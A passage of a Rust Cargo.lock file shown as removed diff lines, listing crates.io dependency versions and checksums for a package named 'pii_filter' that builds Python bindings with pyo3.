"registry+https://github.com/rust-lang/crates.io-index" -checksum = "ddd31a130427c27518df266943a5308ed92d4b226cc639f5a8f1002816174301" -dependencies = [ - "memchr", -] - -[[package]] -name = "alloca" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e5a7d05ea6aea7e9e64d25b9156ba2fee3fdd659e34e41063cd2fc7cd020d7f4" -dependencies = [ - "cc", -] - -[[package]] -name = "android_system_properties" -version = "0.1.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "819e7219dbd41043ac279b19830f2efc897156490d7fd6ea916720117ee66311" -dependencies = [ - "libc", -] - -[[package]] -name = "anes" -version = "0.1.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4b46cbb362ab8752921c97e041f5e366ee6297bd428a31275b9fcf1e380f7299" - -[[package]] -name = "anstyle" -version = "1.0.13" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5192cca8006f1fd4f7237516f40fa183bb07f8fbdfedaa0036de5ea9b0b45e78" - -[[package]] -name = "anyhow" -version = "1.0.101" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5f0e0fee31ef5ed1ba1316088939cea399010ed7731dba877ed44aeb407a75ea" - -[[package]] -name = "autocfg" -version = "1.5.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c08606f8c3cbf4ce6ec8e28fb0014a2c086708fe954eaa885384a6165172e7e8" - -[[package]] -name = "block-buffer" -version = "0.10.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3078c7629b62d3f0439517fa394996acacc5cbc91c5a20d8c658e77abd503a71" -dependencies = [ - "generic-array", -] - -[[package]] -name = "bumpalo" -version = "3.19.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5dd9dc738b7a8311c7ade152424974d8115f2cdad61e8dab8dac9f2362298510" - -[[package]] -name = "cast" -version = "0.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "37b2a672a2cb129a2e41c10b1224bb368f9f37a2b16b612598138befd7b37eb5" - -[[package]] -name = "cc" -version = "1.2.56" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "aebf35691d1bfb0ac386a69bac2fde4dd276fb618cf8bf4f5318fe285e821bb2" -dependencies = [ - "find-msvc-tools", - "shlex", -] - -[[package]] -name = "cfg-if" -version = "1.0.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9330f8b2ff13f34540b44e946ef35111825727b38d33286ef986142615121801" - -[[package]] -name = "chrono" -version = "0.4.43" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fac4744fb15ae8337dc853fee7fb3f4e48c0fbaa23d0afe49c447b4fab126118" -dependencies = [ - "iana-time-zone", - "js-sys", - "num-traits", - "wasm-bindgen", - "windows-link", -] - -[[package]] -name = "ciborium" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "42e69ffd6f0917f5c029256a24d0161db17cea3997d185db0d35926308770f0e" -dependencies = [ - "ciborium-io", - "ciborium-ll", - "serde", -] - -[[package]] -name = "ciborium-io" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "05afea1e0a06c9be33d539b876f1ce3692f4afea2cb41f740e7743225ed1c757" - -[[package]] -name = "ciborium-ll" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "57663b653d948a338bfb3eeba9bb2fd5fcfaecb9e199e87e1eda4d9e8b240fd9" -dependencies = [ - "ciborium-io", - "half", -] - -[[package]] -name = "clap" -version = "4.5.58" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "63be97961acde393029492ce0be7a1af7e323e6bae9511ebfac33751be5e6806" -dependencies = [ - "clap_builder", -] - -[[package]] -name = "clap_builder" -version = "4.5.58" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7f13174bda5dfd69d7e947827e5af4b0f2f94a4a3ee92912fba07a66150f21e2" -dependencies = [ - "anstyle", - "clap_lex", -] - -[[package]] -name = "clap_lex" -version = "1.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3a822ea5bc7590f9d40f1ba12c0dc3c2760f3482c6984db1573ad11031420831" - -[[package]] -name = "core-foundation-sys" -version = "0.8.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "773648b94d0e5d620f64f280777445740e61fe701025087ec8b57f45c791888b" - -[[package]] -name = "cpufeatures" -version = "0.2.17" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "59ed5838eebb26a2bb2e58f6d5b5316989ae9d08bab10e0e6d103e656d1b0280" -dependencies = [ - "libc", -] - -[[package]] -name = "criterion" -version = "0.8.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "950046b2aa2492f9a536f5f4f9a3de7b9e2476e575e05bd6c333371add4d98f3" -dependencies = [ - "alloca", - "anes", - "cast", - "ciborium", - "clap", - "criterion-plot", - "itertools 0.13.0", - "num-traits", - "oorandom", - "page_size", - "plotters", - "rayon", - "regex", - "serde", - "serde_json", - "tinytemplate", - "walkdir", -] - -[[package]] -name = "criterion-plot" -version = "0.8.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d8d80a2f4f5b554395e47b5d8305bc3d27813bacb73493eb1001e8f76dae29ea" -dependencies = [ - "cast", - "itertools 0.13.0", -] - -[[package]] -name = "crossbeam-deque" -version = "0.8.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9dd111b7b7f7d55b72c0a6ae361660ee5853c9af73f70c3c2ef6858b950e2e51" -dependencies = [ - "crossbeam-epoch", - "crossbeam-utils", -] - -[[package]] -name = "crossbeam-epoch" -version = "0.9.18" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5b82ac4a3c2ca9c3460964f020e1402edd5753411d7737aa39c3714ad1b5420e" -dependencies = [ - "crossbeam-utils", -] - -[[package]] -name = "crossbeam-utils" -version = "0.8.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d0a5c400df2834b80a4c3327b3aad3a4c4cd4de0629063962b03235697506a28" - -[[package]] -name = "crunchy" -version = "0.2.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "460fbee9c2c2f33933d720630a6a0bac33ba7053db5344fac858d4b8952d77d5" - -[[package]] -name = "crypto-common" -version = "0.1.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "78c8292055d1c1df0cce5d180393dc8cce0abec0a7102adb6c7b1eef6016d60a" -dependencies = [ - "generic-array", - "typenum", -] - -[[package]] -name = "deranged" -version = "0.5.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cc3dc5ad92c2e2d1c193bbbbdf2ea477cb81331de4f3103f267ca18368b988c4" -dependencies = [ - "powerfmt", -] - -[[package]] -name = "digest" -version = "0.10.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9ed9a281f7bc9b7576e61468ba615a66a5c8cfdff42420a70aa82701a3b1e292" -dependencies = [ - "block-buffer", - "crypto-common", -] - -[[package]] -name = "either" -version = "1.15.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "48c757948c5ede0e46177b7add2e67155f70e33c07fea8284df6576da70b3719" - -[[package]] -name = "equivalent" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "877a4ace8713b0bcf2a4e7eec82529c029f1d0619886d18145fea96c3ffe5c0f" - -[[package]] -name = "find-msvc-tools" -version = "0.1.9" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5baebc0774151f905a1a2cc41989300b1e6fbb29aff0ceffa1064fdd3088d582" - -[[package]] -name = "generic-array" -version = "0.14.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "85649ca51fd72272d7821adaf274ad91c288277713d9c18820d8499a7ff69e9a" -dependencies = [ - "typenum", - "version_check", -] - -[[package]] -name = "getopts" -version = "0.2.24" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cfe4fbac503b8d1f88e6676011885f34b7174f46e59956bba534ba83abded4df" -dependencies = [ - "unicode-width", -] - -[[package]] -name = "getrandom" -version = "0.2.17" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ff2abc00be7fca6ebc474524697ae276ad847ad0a6b3faa4bcb027e9a4614ad0" -dependencies = [ - "cfg-if", - "libc", - "wasi", -] - -[[package]] -name = "getrandom" -version = "0.3.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "899def5c37c4fd7b2664648c28120ecec138e4d395b459e5ca34f9cce2dd77fd" -dependencies = [ - "cfg-if", - "libc", - "r-efi", - "wasip2", -] - -[[package]] -name = "half" -version = "2.7.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6ea2d84b969582b4b1864a92dc5d27cd2b77b622a8d79306834f1be5ba20d84b" -dependencies = [ - "cfg-if", - "crunchy", - "zerocopy", -] - -[[package]] -name = "hashbrown" -version = "0.16.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "841d1cc9bed7f9236f321df977030373f4a4163ae1a7dbfe1a51a2c1a51d9100" - -[[package]] -name = "heck" -version = "0.5.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2304e00983f87ffb38b55b444b5e3b60a884b5d30c0fca7d82fe33449bbe55ea" - -[[package]] -name = "iana-time-zone" -version = "0.1.65" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e31bc9ad994ba00e440a8aa5c9ef0ec67d5cb5e5cb0cc7f8b744a35b389cc470" -dependencies = [ - "android_system_properties", - "core-foundation-sys", - "iana-time-zone-haiku", - "js-sys", - "log", - "wasm-bindgen", - "windows-core", -] - -[[package]] -name = "iana-time-zone-haiku" -version = "0.1.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f31827a206f56af32e590ba56d5d2d085f558508192593743f16b2306495269f" -dependencies = [ - "cc", -] - -[[package]] -name = "indexmap" -version = "2.13.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7714e70437a7dc3ac8eb7e6f8df75fd8eb422675fc7678aff7364301092b1017" -dependencies = [ - "equivalent", - "hashbrown", -] - -[[package]] -name = "inventory" -version = "0.3.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bc61209c082fbeb19919bee74b176221b27223e27b65d781eb91af24eb1fb46e" -dependencies = [ - "rustversion", -] - -[[package]] -name = "is-macro" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1d57a3e447e24c22647738e4607f1df1e0ec6f72e16182c4cd199f647cdfb0e4" -dependencies = [ - "heck", - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "itertools" -version = "0.11.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b1c173a5686ce8bfa551b3563d0c2170bf24ca44da99c7ca4bfdab5418c3fe57" -dependencies = [ - "either", -] - -[[package]] -name = "itertools" -version = "0.13.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "413ee7dfc52ee1a4949ceeb7dbc8a33f2d6c088194d9f922fb8318faf1f01186" -dependencies = [ - "either", -] - -[[package]] -name = "itertools" -version = "0.14.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2b192c782037fadd9cfa75548310488aabdbf3d2da73885b31bd0abd03351285" -dependencies = [ - "either", -] - -[[package]] -name = "itoa" -version = "1.0.17" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "92ecc6618181def0457392ccd0ee51198e065e016d1d527a7ac1b6dc7c1f09d2" - -[[package]] -name = "js-sys" -version = "0.3.85" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8c942ebf8e95485ca0d52d97da7c5a2c387d0e7f0ba4c35e93bfcaee045955b3" -dependencies = [ - "once_cell", - "wasm-bindgen", -] - -[[package]] -name = "lalrpop-util" -version = "0.20.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "507460a910eb7b32ee961886ff48539633b788a36b65692b95f225b844c82553" - -[[package]] -name = "libc" -version = "0.2.182" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6800badb6cb2082ffd7b6a67e6125bb39f18782f793520caee8cb8846be06112" - -[[package]] -name = "log" -version = "0.4.29" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5e5032e24019045c762d3c0f28f5b6b8bbf38563a65908389bf7978758920897" - -[[package]] -name = "maplit" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3e2e65a1a2e43cfcb47a895c4c8b10d1f4a61097f9f254f183aee60cad9c651d" - -[[package]] -name = "matrixmultiply" -version = "0.3.10" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a06de3016e9fae57a36fd14dba131fccf49f74b40b7fbdb472f96e361ec71a08" -dependencies = [ - "autocfg", - "rawpointer", -] - -[[package]] -name = "memchr" -version = "2.8.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f8ca58f447f06ed17d5fc4043ce1b10dd205e060fb3ce5b979b8ed8e59ff3f79" - -[[package]] -name = "ndarray" -version = "0.17.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "520080814a7a6b4a6e9070823bb24b4531daac8c4627e08ba5de8c5ef2f2752d" -dependencies = [ - "matrixmultiply", - "num-complex", - "num-integer", - "num-traits", - "portable-atomic", - "portable-atomic-util", - "rawpointer", -] - -[[package]] -name = "num-bigint" -version = "0.4.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a5e44f723f1133c9deac646763579fdb3ac745e418f2a7af9cd0c431da1f20b9" -dependencies = [ - "num-integer", - "num-traits", -] - -[[package]] -name = "num-complex" -version = "0.4.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "73f88a1307638156682bada9d7604135552957b7818057dcef22705b4d509495" -dependencies = [ - "num-traits", -] - -[[package]] -name = "num-conv" -version = "0.2.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cf97ec579c3c42f953ef76dbf8d55ac91fb219dde70e49aa4a6b7d74e9919050" - -[[package]] -name = "num-integer" -version = "0.1.46" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7969661fd2958a5cb096e56c8e1ad0444ac2bbcd0061bd28660485a44879858f" -dependencies = [ - "num-traits", -] - -[[package]] -name = "num-traits" -version = "0.2.19" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "071dfc062690e90b734c0b2273ce72ad0ffa95f0c74596bc250dcfd960262841" -dependencies = [ - "autocfg", -] - -[[package]] -name = "numpy" -version = "0.28.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "778da78c64ddc928ebf5ad9df5edf0789410ff3bdbf3619aed51cd789a6af1e2" -dependencies = [ - "libc", - "ndarray", - "num-complex", - "num-integer", - "num-traits", - "pyo3", - "pyo3-build-config", - "rustc-hash 2.1.1", -] - -[[package]] -name = "once_cell" -version = "1.21.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "42f5e15c9953c5e4ccceeb2e7382a716482c34515315f7b03532b8b4e8393d2d" - -[[package]] -name = "oorandom" -version = "11.1.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d6790f58c7ff633d8771f42965289203411a5e5c68388703c06e14f24770b41e" - -[[package]] -name = "ordered-float" -version = "5.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7f4779c6901a562440c3786d08192c6fbda7c1c2060edd10006b05ee35d10f2d" -dependencies = [ - "num-traits", -] - -[[package]] -name = "page_size" -version = "0.6.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "30d5b2194ed13191c1999ae0704b7839fb18384fa22e49b57eeaa97d79ce40da" -dependencies = [ - "libc", - "winapi", -] - -[[package]] -name = "phf" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1fd6780a80ae0c52cc120a26a1a42c1ae51b247a253e4e06113d23d2c2edd078" -dependencies = [ - "phf_shared", -] - -[[package]] -name = "phf_codegen" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "aef8048c789fa5e851558d709946d6d79a8ff88c0440c587967f8e94bfb1216a" -dependencies = [ - "phf_generator", - "phf_shared", -] - -[[package]] -name = "phf_generator" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3c80231409c20246a13fddb31776fb942c38553c51e871f8cbd687a4cfb5843d" -dependencies = [ - "phf_shared", - "rand", -] - -[[package]] -name = "phf_shared" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "67eabc2ef2a60eb7faa00097bd1ffdb5bd28e62bf39990626a582201b7a754e5" -dependencies = [ - "siphasher", -] - -[[package]] -name = "pii_filter" -version = "1.0.0-RC-2" -dependencies = [ - "criterion", - "once_cell", - "pyo3", - "pyo3-stub-gen", - "regex", - "serde", - "serde_json", - "sha2", - "thiserror", - "uuid", -] - -[[package]] -name = "plotters" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5aeb6f403d7a4911efb1e33402027fc44f29b5bf6def3effcc22d7bb75f2b747" -dependencies = [ - "num-traits", - "plotters-backend", - "plotters-svg", - "wasm-bindgen", - "web-sys", -] - -[[package]] -name = "plotters-backend" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "df42e13c12958a16b3f7f4386b9ab1f3e7933914ecea48da7139435263a4172a" - -[[package]] -name = "plotters-svg" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "51bae2ac328883f7acdfea3d66a7c35751187f870bc81f94563733a154d7a670" -dependencies = [ - "plotters-backend", -] - -[[package]] -name = "portable-atomic" -version = "1.13.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c33a9471896f1c69cecef8d20cbe2f7accd12527ce60845ff44c153bb2a21b49" - -[[package]] -name = "portable-atomic-util" -version = "0.2.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7a9db96d7fa8782dd8c15ce32ffe8680bbd1e978a43bf51a34d39483540495f5" -dependencies = [ - "portable-atomic", -] - -[[package]] -name = "powerfmt" -version = "0.2.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "439ee305def115ba05938db6eb1644ff94165c5ab5e9420d1c1bcedbba909391" - -[[package]] -name = "ppv-lite86" -version = "0.2.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "85eae3c4ed2f50dcfe72643da4befc30deadb458a9b590d720cde2f2b1e97da9" -dependencies = [ - "zerocopy", -] - -[[package]] -name = "proc-macro2" -version = "1.0.106" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8fd00f0bb2e90d81d1044c2b32617f68fcb9fa3bb7640c23e9c748e53fb30934" -dependencies = [ - "unicode-ident", -] - -[[package]] -name = "pyo3" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cf85e27e86080aafd5a22eae58a162e133a589551542b3e5cee4beb27e54f8e1" -dependencies = [ - "libc", - "once_cell", - "portable-atomic", - "pyo3-build-config", - "pyo3-ffi", - "pyo3-macros", -] - -[[package]] -name = "pyo3-build-config" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8bf94ee265674bf76c09fa430b0e99c26e319c945d96ca0d5a8215f31bf81cf7" -dependencies = [ - "target-lexicon", -] - -[[package]] -name = "pyo3-ffi" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "491aa5fc66d8059dd44a75f4580a2962c1862a1c2945359db36f6c2818b748dc" -dependencies = [ - "libc", - "pyo3-build-config", -] - -[[package]] -name = "pyo3-macros" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f5d671734e9d7a43449f8480f8b38115df67bef8d21f76837fa75ee7aaa5e52e" -dependencies = [ - "proc-macro2", - "pyo3-macros-backend", - "quote", - "syn", -] - -[[package]] -name = "pyo3-macros-backend" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "22faaa1ce6c430a1f71658760497291065e6450d7b5dc2bcf254d49f66ee700a" -dependencies = [ - "heck", - "proc-macro2", - "pyo3-build-config", - "quote", - "syn", -] - -[[package]] -name = "pyo3-stub-gen" -version = "0.19.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b159f7704044f57d058f528a6f1f22a0a0a327dcb595c5fb38beae658e0338d6" -dependencies = [ - "anyhow", - "chrono", - "either", - "indexmap", - "inventory", - "itertools 0.14.0", - "log", - "maplit", - "num-complex", - "numpy", - "ordered-float", - "pyo3", - "pyo3-stub-gen-derive", - "rustpython-parser", - "serde", - "serde_json", - "time", - "toml", -] - -[[package]] -name = "pyo3-stub-gen-derive" -version = "0.19.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a8c79e7c5b1fcec7c39ab186594658a971c59911eb6fbab5a5932cf2318534be" -dependencies = [ - "heck", - "indexmap", - "proc-macro2", - "quote", - "rustpython-parser", - "syn", -] - -[[package]] -name = "quote" -version = "1.0.44" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "21b2ebcf727b7760c461f091f9f0f539b77b8e87f2fd88131e7f1b433b3cece4" -dependencies = [ - "proc-macro2", -] - -[[package]] -name = "r-efi" -version = "5.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "69cdb34c158ceb288df11e18b4bd39de994f6657d83847bdffdbd7f346754b0f" - -[[package]] -name = "rand" -version = "0.8.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "34af8d1a0e25924bc5b7c43c079c942339d8f0a8b57c39049bef581b46327404" -dependencies = [ - "libc", - "rand_chacha", - "rand_core", -] - -[[package]] -name = "rand_chacha" -version = "0.3.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6c10a63a0fa32252be49d21e7709d4d4baf8d231c2dbce1eaa8141b9b127d88" -dependencies = [ - "ppv-lite86", - "rand_core", -] - -[[package]] -name = "rand_core" -version = "0.6.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ec0be4795e2f6a28069bec0b5ff3e2ac9bafc99e6a9a7dc3547996c5c816922c" -dependencies = [ - "getrandom 0.2.17", -] - -[[package]] -name = "rawpointer" -version = "0.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "60a357793950651c4ed0f3f52338f53b2f809f32d83a07f72909fa13e4c6c1e3" - -[[package]] -name = "rayon" -version = "1.11.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "368f01d005bf8fd9b1206fb6fa653e6c4a81ceb1466406b81792d87c5677a58f" -dependencies = [ - "either", - "rayon-core", -] - -[[package]] -name = "rayon-core" -version = "1.13.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "22e18b0f0062d30d4230b2e85ff77fdfe4326feb054b9783a3460d8435c8ab91" -dependencies = [ - "crossbeam-deque", - "crossbeam-utils", -] - -[[package]] -name = "regex" -version = "1.12.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e10754a14b9137dd7b1e3e5b0493cc9171fdd105e0ab477f51b72e7f3ac0e276" -dependencies = [ - "aho-corasick", - "memchr", - "regex-automata", - "regex-syntax", -] - -[[package]] -name = "regex-automata" -version = "0.4.14" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6e1dd4122fc1595e8162618945476892eefca7b88c52820e74af6262213cae8f" -dependencies = [ - "aho-corasick", - "memchr", - "regex-syntax", -] - -[[package]] -name = "regex-syntax" -version = "0.8.9" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a96887878f22d7bad8a3b6dc5b7440e0ada9a245242924394987b21cf2210a4c" - -[[package]] -name = "rustc-hash" -version = "1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "08d43f7aa6b08d49f382cde6a7982047c3426db949b1424bc4b7ec9ae12c6ce2" - -[[package]] -name = "rustc-hash" -version = "2.1.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "357703d41365b4b27c590e3ed91eabb1b663f07c4c084095e60cbed4362dff0d" - -[[package]] -name = "rustpython-ast" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4cdaf8ee5c1473b993b398c174641d3aa9da847af36e8d5eb8291930b72f31a5" -dependencies = [ - "is-macro", - "num-bigint", - "rustpython-parser-core", - "static_assertions", -] - -[[package]] -name = "rustpython-parser" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "868f724daac0caf9bd36d38caf45819905193a901e8f1c983345a68e18fb2abb" -dependencies = [ - "anyhow", - "is-macro", - "itertools 0.11.0", - "lalrpop-util", - "log", - "num-bigint", - "num-traits", - "phf", - "phf_codegen", - "rustc-hash 1.1.0", - "rustpython-ast", - "rustpython-parser-core", - "tiny-keccak", - "unic-emoji-char", - "unic-ucd-ident", - "unicode_names2", -] - -[[package]] -name = "rustpython-parser-core" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b4b6c12fa273825edc7bccd9a734f0ad5ba4b8a2f4da5ff7efe946f066d0f4ad" -dependencies = [ - "is-macro", - "memchr", - "rustpython-parser-vendored", -] - -[[package]] -name = "rustpython-parser-vendored" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "04fcea49a4630a3a5d940f4d514dc4f575ed63c14c3e3ed07146634aed7f67a6" -dependencies = [ - "memchr", - "once_cell", -] - -[[package]] -name = "rustversion" -version = "1.0.22" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b39cdef0fa800fc44525c84ccb54a029961a8215f9619753635a9c0d2538d46d" - -[[package]] -name = "same-file" -version = "1.0.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502" -dependencies = [ - "winapi-util", -] - -[[package]] -name = "serde" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9a8e94ea7f378bd32cbbd37198a4a91436180c5bb472411e48b5ec2e2124ae9e" -dependencies = [ - "serde_core", - "serde_derive", -] - -[[package]] -name = "serde_core" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "41d385c7d4ca58e59fc732af25c3983b67ac852c1a25000afe1175de458b67ad" -dependencies = [ - "serde_derive", -] - -[[package]] -name = "serde_derive" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d540f220d3187173da220f885ab66608367b6574e925011a9353e4badda91d79" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "serde_json" -version = "1.0.149" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "83fc039473c5595ace860d8c4fafa220ff474b3fc6bfdb4293327f1a37e94d86" -dependencies = [ - "itoa", - "memchr", - "serde", - "serde_core", - "zmij", -] - -[[package]] -name = "serde_spanned" -version = "1.0.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f8bbf91e5a4d6315eee45e704372590b30e260ee83af6639d64557f51b067776" -dependencies = [ - "serde_core", -] - -[[package]] -name = "sha2" -version = "0.10.9" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a7507d819769d01a365ab707794a4084392c824f54a7a6a7862f8c3d0892b283" -dependencies = [ - "cfg-if", - "cpufeatures", - "digest", -] - -[[package]] -name = "shlex" -version = "1.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0fda2ff0d084019ba4d7c6f371c95d8fd75ce3524c3cb8fb653a3023f6323e64" - -[[package]] -name = "siphasher" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b2aa850e253778c88a04c3d7323b043aeda9d3e30d5971937c1855769763678e" - -[[package]] -name = "static_assertions" -version = "1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f" - -[[package]] -name = "syn" -version = "2.0.116" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3df424c70518695237746f84cede799c9c58fcb37450d7b23716568cc8bc69cb" -dependencies = [ - "proc-macro2", - "quote", - "unicode-ident", -] - -[[package]] -name = "target-lexicon" -version = "0.13.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b1dd07eb858a2067e2f3c7155d54e929265c264e6f37efe3ee7a8d1b5a1dd0ba" - -[[package]] -name = "thiserror" -version = "2.0.18" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4288b5bcbc7920c07a1149a35cf9590a2aa808e0bc1eafaade0b80947865fbc4" -dependencies = [ - "thiserror-impl", -] - -[[package]] -name = "thiserror-impl" -version = "2.0.18" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ebc4ee7f67670e9b64d05fa4253e753e016c6c95ff35b89b7941d6b856dec1d5" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "time" -version = "0.3.47" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "743bd48c283afc0388f9b8827b976905fb217ad9e647fae3a379a9283c4def2c" -dependencies = [ - "deranged", - "num-conv", - "powerfmt", - "serde_core", - "time-core", -] - -[[package]] -name = "time-core" -version = "0.1.8" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7694e1cfe791f8d31026952abf09c69ca6f6fa4e1a1229e18988f06a04a12dca" - -[[package]] -name = "tiny-keccak" -version = "2.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2c9d3793400a45f954c52e73d068316d76b6f4e36977e3fcebb13a2721e80237" -dependencies = [ - "crunchy", -] - -[[package]] -name = 